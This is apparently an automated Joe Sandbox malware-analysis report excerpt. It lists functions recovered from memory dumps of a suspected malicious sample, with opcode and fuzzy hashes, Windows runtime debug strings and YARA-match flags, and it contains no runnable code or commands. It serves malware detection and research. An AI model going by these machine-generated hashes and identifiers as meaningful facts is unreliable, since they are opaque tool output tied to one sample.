                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 0685d1bb033056c0eac445b0733408791c5fd3a4451ecd8bf5ae7a4897934d79
                                                    • Instruction ID: 3c6d35ad1054560b889653e2a3a53a50176566e3d860be6e5af33daa55d29c04
                                                    • Opcode Fuzzy Hash: 0685d1bb033056c0eac445b0733408791c5fd3a4451ecd8bf5ae7a4897934d79
                                                    • Instruction Fuzzy Hash: 1821B37390022AABDB21AE69DC44DEF77EDDF08B94F040565FC09A7144E7709A44CBE1
                                                    Function 022D53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023122F4
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 0231230B
                                                    • RTL: Re-Waiting, xrefs: 02312328
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023122FC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: 1a7504556d0258b81da9abf751d96fee5655978ffd522f90f532ec4a25ba65cc
                                                    • Instruction ID: 2523aac2dcf13f1049b931d98716c50856ad73bf3a2b81ae5b7a4463c62d9323
                                                    • Opcode Fuzzy Hash: 1a7504556d0258b81da9abf751d96fee5655978ffd522f90f532ec4a25ba65cc
                                                    • Instruction Fuzzy Hash: 7A510A716107116BEB65EBA4CC90FA77399EF44324F104629FD05DF284EBB1E942CBA0
                                                    Function 022DEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0231248D
                                                    • RTL: Re-Waiting, xrefs: 023124FA
                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023124BD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                    • API String ID: 0-3177188983
                                                    • Opcode ID: 95828074d396b9b7c16398a9d47c607e1406fd3b7d7da97982e9648af45aab14
                                                    • Instruction ID: e6458271dd17936399490a5696fefac0d5b1d6ca624e94c80587e2ced6ce94ad
                                                    • Opcode Fuzzy Hash: 95828074d396b9b7c16398a9d47c607e1406fd3b7d7da97982e9648af45aab14
                                                    • Instruction Fuzzy Hash: FC41E670A10314ABD724EFA8CC95FAB77A9EF44720F108A05F9599B2C4D774E941CB60
                                                    Function 022EFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID:
                                                    • API String ID: 3965848254-0
                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction ID: b205d90fa7c2ee39407aaec1d7af6a0fb66da7856774b3d75e45fed5aa71ed69
                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction Fuzzy Hash: CC91F331D2020AEEDF28DFD8C9457EEB7B4FF41308FA4806AD806A7655E7305A40DB91
                                                    Function 02365CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: $$0
                                                    • API String ID: 1302938615-389342756
                                                    • Opcode ID: e459368f6591c5ec06b5e3e42908152f5c799708d94662c1407cabc9c6392a7c
                                                    • Instruction ID: 1a5ff2cda517e03406343776308448051c50bec77d94cb179dd09a6762b107fe
                                                    • Opcode Fuzzy Hash: e459368f6591c5ec06b5e3e42908152f5c799708d94662c1407cabc9c6392a7c
                                                    • Instruction Fuzzy Hash: 0D918C70D0438AEEDF24CFA9C4983FDBBB9AF01314F94867AD4A1A7299C7744641CB90

                                                    Executed Functions

                                                    Function 028D6A16 Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$O$S$\$s
                                                    • API String ID: 0-3854637164
                                                    • Opcode ID: 151e09cf65f0f751c6db297e0ae8fd33dcce5e08ccc42ffa15902fe58e44d839
                                                    • Instruction ID: 54d267db76691ee96473e99ba41883240c1c53216fec40c6a80db83e29e97fb9
                                                    • Opcode Fuzzy Hash: 151e09cf65f0f751c6db297e0ae8fd33dcce5e08ccc42ffa15902fe58e44d839
                                                    • Instruction Fuzzy Hash: FF51857AD04128ABDF10DFA8DC49EEEB37DAF45714F004299E90D97140E7719A588FA2
                                                    Function 028C8CC7 Relevance: .6, Instructions: 550COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78dafe30e8a0cdfa92b091a5ef2e30709e6ee516fca2019307b896b8ac48fa80
                                                    • Instruction ID: 6361a05568e95f6a65bd336925f3de30f50a392f5e28a183fd98ee2f353cc435
                                                    • Opcode Fuzzy Hash: 78dafe30e8a0cdfa92b091a5ef2e30709e6ee516fca2019307b896b8ac48fa80
                                                    • Instruction Fuzzy Hash: 2E52B2B8D05269CBEB64CF44C894BEDBBB1BB45308F2081D9C10DBB285CB759A89CF55
                                                    Function 028C27F7 Relevance: .1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 84a1a994a0f4ff10003a82012c9b84276c9cd12baa25c8801ba7c00cf14403a2
                                                    • Instruction ID: 1f02a01cbe05c9aa2bc406f25cdd9fc4fc10092713b3dfb1d595927b2f2886f4
                                                    • Opcode Fuzzy Hash: 84a1a994a0f4ff10003a82012c9b84276c9cd12baa25c8801ba7c00cf14403a2
                                                    • Instruction Fuzzy Hash: 9D414CB5D10228AFDB04CF99DC81AEEBBBCFF49710F10415AFA14E6244E3B196418BA1
                                                    Function 028E7386 Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 011621cf0320650bb6f3d2eae7f290ae53f0bfce14e2147a80d14b104f08680e
                                                    • Instruction ID: 0c6bfa43e7b9f4c7af0f392e3a4c1b31eb15c21047c0634322eb9a28ce687bff
                                                    • Opcode Fuzzy Hash: 011621cf0320650bb6f3d2eae7f290ae53f0bfce14e2147a80d14b104f08680e
                                                    • Instruction Fuzzy Hash: 71310AB9A01648ABCB14DF98D980EDFB7B9EF89700F108219F919A7340D730A955CFA1
                                                    Function 028E72A6 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d07f22c1ef08ac637e363830fb527353372ae5295cb9c56ff5f22257f6903ae
                                                    • Instruction ID: 98ef531beca975af82bf656bb4d6e80307308f4a72cbf4292f54dd4b567481b3
                                                    • Opcode Fuzzy Hash: 8d07f22c1ef08ac637e363830fb527353372ae5295cb9c56ff5f22257f6903ae
                                                    • Instruction Fuzzy Hash: CD31FBB9A00648ABDB24DF98DD41EDFB7B9EF89700F10410AF919A7244D770A915CFA1
                                                    Function 028E7BE6 Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6a33b3b99a40af93edb2e5d0eb7308dafb0623a829c54a782da8ceef4fb20741
                                                    • Instruction ID: 243eaaa597f485db364c6d05ca393ccb08c677d897fbaa2cf2e705e54c2432fa
                                                    • Opcode Fuzzy Hash: 6a33b3b99a40af93edb2e5d0eb7308dafb0623a829c54a782da8ceef4fb20741
                                                    • Instruction Fuzzy Hash: 712151B5A00608AFDB14DF98CD41EAF77BDEF89710F104509F919A7240D770A911CFA1
                                                    Function 028D6856 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a5411da943d6ec342d26af169eb24cd316df4150fbf77f3f1b8d6527b6a7857
                                                    • Instruction ID: e3575caed9867abb3b29e3302d0aa2f6ed9e0da15160a5ded375ed2bc7e0b7d6
                                                    • Opcode Fuzzy Hash: 0a5411da943d6ec342d26af169eb24cd316df4150fbf77f3f1b8d6527b6a7857
                                                    • Instruction Fuzzy Hash: 27118A7A380319B7F7209A599C82F6B775D9BC5B50F244015FF04EA2C1E6A4B8114AB6
                                                    Function 028E6F36 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a84a066e53820aec39e7d341b5bba0dca52a8614ec1991c3cc370267d0383cbf
                                                    • Instruction ID: f5d5bfdafa47f2ba45980d0c52fa7a166167d15cd93a9908fcbf08df07959efe
                                                    • Opcode Fuzzy Hash: a84a066e53820aec39e7d341b5bba0dca52a8614ec1991c3cc370267d0383cbf
                                                    • Instruction Fuzzy Hash: 70119079A01644ABDB20EF98CD41FAF77BDEF85710F104509F919EB280E771B9058BA2
                                                    Function 028E3C96 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57f7ea6b3d54a615053e1815eabdd287c479bfea82b592be5956accb8dc41794
                                                    • Instruction ID: f909c1f42430d6b891f665d7c2dba7fccbea5108033f2042f65b706a0d9b222b
                                                    • Opcode Fuzzy Hash: 57f7ea6b3d54a615053e1815eabdd287c479bfea82b592be5956accb8dc41794
                                                    • Instruction Fuzzy Hash: 5C21FEB6D01219AF8B04DFA9D8419EFB7F9EF89310F14456AE915E7200E7719A048FA1
                                                    Function 028E70B6 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cec06388d0f372d5fcf828d5c69cdd2d6b25887ce9724197ad13a87176e1485f
                                                    • Instruction ID: fce3e84c94662ec495df61a1f2b92787a6a4a9b69d1f3430e744e71f9f543cf5
                                                    • Opcode Fuzzy Hash: cec06388d0f372d5fcf828d5c69cdd2d6b25887ce9724197ad13a87176e1485f
                                                    • Instruction Fuzzy Hash: 78119379601644BBDB20EFA8CC41FAF77ADDF85710F004509F919A7280E771A9048BA1
                                                    Function 028E4FD6 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ed94735c6b95bcc47125f74b523c96bac912e72b05ab7ed8ffa686291814c5a1
                                                    • Instruction ID: d815a72877af1c4c228634c46bb29a234be99fb77c2b2cb4ced93ea49120603a
                                                    • Opcode Fuzzy Hash: ed94735c6b95bcc47125f74b523c96bac912e72b05ab7ed8ffa686291814c5a1
                                                    • Instruction Fuzzy Hash: EF111FB6D01218AF9B01DFA9D8419EFB7FDEF48210F14416EE919E7240E7709A05CFA1
                                                    Function 028E7F36 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: efb157d0752e45777f08207ac940657a96539801c1bee21f4fd31e1368fa7836
                                                    • Instruction ID: 4120cfa89bca961a9b3c8741b7cc04b4fe8dc3b946b990021a72891ab05e615f
                                                    • Opcode Fuzzy Hash: efb157d0752e45777f08207ac940657a96539801c1bee21f4fd31e1368fa7836
                                                    • Instruction Fuzzy Hash: 3201D2B6201208BBCB14DF99DC80EEB77ADEF8D754F108108FA19E3240D630F8528BA5
                                                    Function 028E3C06 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bdfb5e6f1b889a9e088a8c23c37729c950c939a6cbaf25e45440dfaf893db22
                                                    • Instruction ID: 370bc75c4a1b832a66ebd08c6c4a15be05c20a765a5802447929660255411274
                                                    • Opcode Fuzzy Hash: 7bdfb5e6f1b889a9e088a8c23c37729c950c939a6cbaf25e45440dfaf893db22
                                                    • Instruction Fuzzy Hash: A101DBBAC11219AF8B04DFE8C9409EEBBF9AB08204F15426EE915F2200E7705A048BA5
                                                    Function 028C2950 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c0f11fbba4f8a7a9979b714e33d1383261f09e7fe9335127930d0beca261a82
                                                    • Instruction ID: 33a07bcd621446c2dbefbf10849dd6e42c34a635b8309d3867dfa386ae2d1c77
                                                    • Opcode Fuzzy Hash: 7c0f11fbba4f8a7a9979b714e33d1383261f09e7fe9335127930d0beca261a82
                                                    • Instruction Fuzzy Hash: C9F046BF6042126BC7244E68EC80F9ABBACFB44334F240126FD4CCA286E332C41587A1
                                                    Function 028D6A14 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1230c3dee51c569c8c4585ebc71215c565069a200776d711d2ef7f7b0f2aec3e
                                                    • Instruction ID: 836f843adff5ce97fcbd4ab1b5119c4c27c928126198750788b8ba87beedd279
                                                    • Opcode Fuzzy Hash: 1230c3dee51c569c8c4585ebc71215c565069a200776d711d2ef7f7b0f2aec3e
                                                    • Instruction Fuzzy Hash: CBF0F679D04118AEFF20EB78CC49EEE73789F44310F004289E80DA2140EA7149948F52
                                                    Function 028E71B6 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 653f4112c04f0f1633ab862b0a99385270da6461914d02eb2a5d4e31a65a3469
                                                    • Instruction ID: 16695239d01ff8868f0be040280f8d5dd91f6c3eef0be08fba14aa4c7fe1b278
                                                    • Opcode Fuzzy Hash: 653f4112c04f0f1633ab862b0a99385270da6461914d02eb2a5d4e31a65a3469
                                                    • Instruction Fuzzy Hash: 49F01C79200604BBDB10DFADEC81E9B77ADEF89750F108409BA1CE7241D670B911CBB5
                                                    Function 028E7E56 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1f5168b2d3f02af106151740da9b9a7126ca15e01a09804e7c9851fc78608c9f
                                                    • Instruction ID: 1bd3ffcfeddc47954c94ec7a41b5a1edcb9f113583f2f90ff22d4880cfc3329d
                                                    • Opcode Fuzzy Hash: 1f5168b2d3f02af106151740da9b9a7126ca15e01a09804e7c9851fc78608c9f
                                                    • Instruction Fuzzy Hash: 91E06D75204204BFD624EF58EC40E9B77ADEF8A750F004409F91DA7240D630B8108EB5
                                                    Function 028D6976 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dcef2ca0a8ce06a68b0ac5d8c896cd55e32ccd42d76dd8b6fc0b9371466b31c9
                                                    • Instruction ID: c47969b469029b156a4dd38a8399bfacc3702fca5882ef95a56bf2b403f42ac0
                                                    • Opcode Fuzzy Hash: dcef2ca0a8ce06a68b0ac5d8c896cd55e32ccd42d76dd8b6fc0b9371466b31c9
                                                    • Instruction Fuzzy Hash: 8BF0827581520CEBDF14CF64E841BDEBBB8EB44320F10436AE829DB2C0E63497548B82
                                                    Function 028E9C86 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7331c3d159fce374688f08d1e3d34e9c7e925cbc525d024deb585f852cf1db0e
                                                    • Instruction ID: e6bbbe1f3778eff37b996ad46c07476dea54649e77a18434571f3be36c4bed7b
                                                    • Opcode Fuzzy Hash: 7331c3d159fce374688f08d1e3d34e9c7e925cbc525d024deb585f852cf1db0e
                                                    • Instruction Fuzzy Hash: 61E04F7E600224A7EA2076999D05F57B7AD8BC6E64F050024FE1DDB240E6A1AD0046E6
                                                    Function 028D6973 Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d802af0e062529e49fd9b1e7908cc66d9a8f391173807913101ab49b213c7c71
                                                    • Instruction ID: 9bce4e27e240761c4555b83a83fdf08eccf8eb7a77cfde0cd1001af058585b5b
                                                    • Opcode Fuzzy Hash: d802af0e062529e49fd9b1e7908cc66d9a8f391173807913101ab49b213c7c71
                                                    • Instruction Fuzzy Hash: C0E0927981900CEBEF08CF68E841BDEBBA9DB05321F10436EE819CB280E63597548B42
                                                    Function 028E7B56 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 552fb4393f17a8b273767768362a55393defdc292ee165eb9e961f1bb2424b9c
                                                    • Instruction ID: 237cfe9ee8cd9054e5a25afe7cf485ccca0cee245e0c9d182c6de9b939b888d4
                                                    • Opcode Fuzzy Hash: 552fb4393f17a8b273767768362a55393defdc292ee165eb9e961f1bb2424b9c
                                                    • Instruction Fuzzy Hash: 08E0463A200604BBD620AB69EC01E9BB7ADDFC6760F104429FA1CA7241DA71B9018AB5
                                                    Function 028C97C9 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80db95437e89400a2709d7c7c3c260bbe43a585b604d60c3f22d39844ea39b09
                                                    • Instruction ID: 352f8cd5fae0a120e7a72cbeddfca75ef0a27c39c8139013cd70d627a7d1472c
                                                    • Opcode Fuzzy Hash: 80db95437e89400a2709d7c7c3c260bbe43a585b604d60c3f22d39844ea39b09
                                                    • Instruction Fuzzy Hash: 07C02B8F380001254C1531BC38800B13702489336532008F5F28AE824CF74148100343

                                                    Non-executed Functions

                                                    Function 028D2739 Relevance: 68.9, Strings: 55, Instructions: 172COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
